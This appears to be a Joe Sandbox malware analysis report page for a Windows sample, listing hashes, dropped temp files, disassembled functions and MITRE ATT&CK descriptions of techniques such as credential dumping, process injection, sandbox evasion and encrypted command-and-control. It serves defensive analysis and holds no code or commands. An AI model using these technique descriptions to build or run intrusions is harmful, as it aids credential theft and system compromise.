Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 0bdbf6febcbed90f4d338904493352af546224ae06b87a22832ec12d017acc8f
Instruction ID: 200626098d69c3779eb8761f361a805241a88bb60932c70a74dd860bc6a72077
Opcode Fuzzy Hash: 0bdbf6febcbed90f4d338904493352af546224ae06b87a22832ec12d017acc8f
Instruction Fuzzy Hash: DDC00235142184BAEA211B77AC0DECB3E3DE7CBF92712016CB215950B586650096D624

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 150-425-2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Clinton

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\aut52A6.tmp

C:\Users\user\AppData\Local\Temp\aut5333.tmp

C:\Users\user\AppData\Local\Temp\nonsubmerged

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
150-425-2024.exe

Function 00BC3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00BC4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00BC4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00C293DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00BC3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69
windowregistryCOMMON

Function 00BC3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00BC71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00BC3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00BC3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00BC3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 038D2650 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00BC39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 038D2410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre